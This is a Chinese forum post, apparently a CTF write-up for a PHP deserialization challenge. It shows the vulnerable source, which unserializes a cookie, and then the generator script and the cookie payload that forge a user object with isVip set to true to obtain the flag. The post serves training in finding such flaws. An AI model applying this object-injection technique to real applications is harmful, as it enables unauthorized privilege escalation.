CTF-34解题思路

Track-子羽   ·   发表于 2021-11-22 17:33:11   ·   CTF&WP专版

源码分析

  1. <h3>挑战VIP会员的第二天<h3/>
  2. <?php
  3. error_reporting(0);
  4. highlight_file(__FILE__);
  5. include('flag.php');
  6. class ctfShowUser
  7. {
  8. public $username='xxxxxx';
  9. public $password='xxxxxx';
  10. public $isVip=false;
  11. public function checkVip()
  12. {
  13. return $this->isVip;
  14. }
  15. public function login($u,$p)
  16. {
  17. return $this->username===$u&&$this->password===$p;
  18. }
  19. public function vipOneKeyGetFlag(){
  20. if($this->isVip)
  21. {
  22. global $flag;
  23. echo "your flag is ".$flag;
  24. }
  25. else
  26. {
  27. echo "no vip, no flag";
  28. }
  29. }
  30. }
  31. $username=$_GET['username'];
  32. $password=$_GET['password'];
  33. if(isset($username) && isset($password))
  34. {
  35. $user = unserialize($_COOKIE['user']);
  36. if($user->login($username,$password))
  37. {
  38. if($user->checkVip())
  39. {
  40. $user->vipOneKeyGetFlag();
  41. }
  42. }
  43. else
  44. {
  45. echo "no vip,no flag";
  46. }
  47. }

反序列化的点在cookie的user中,我们需要让$isVip=true

生成序列化对象:

  1. <?php
  2. class ctfShowUser
  3. {
  4. public $isVip=true;
  5. }
  6. $a= serialize(new ctfShowUser());
  7. echo urlencode($a);
  8. ?>
  9. //运行结果
  10. O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}
  11. O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

payload:

  1. ?username=xxxxxx&password=xxxxxx
  2. Cookie设置成:user=O:11:"ctfShowUser":1:{s:5:"isVip"%3bb:1%3b}

打赏我,让我更有动力~

0 条回复   |  直到 2021-11-22 | 601 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.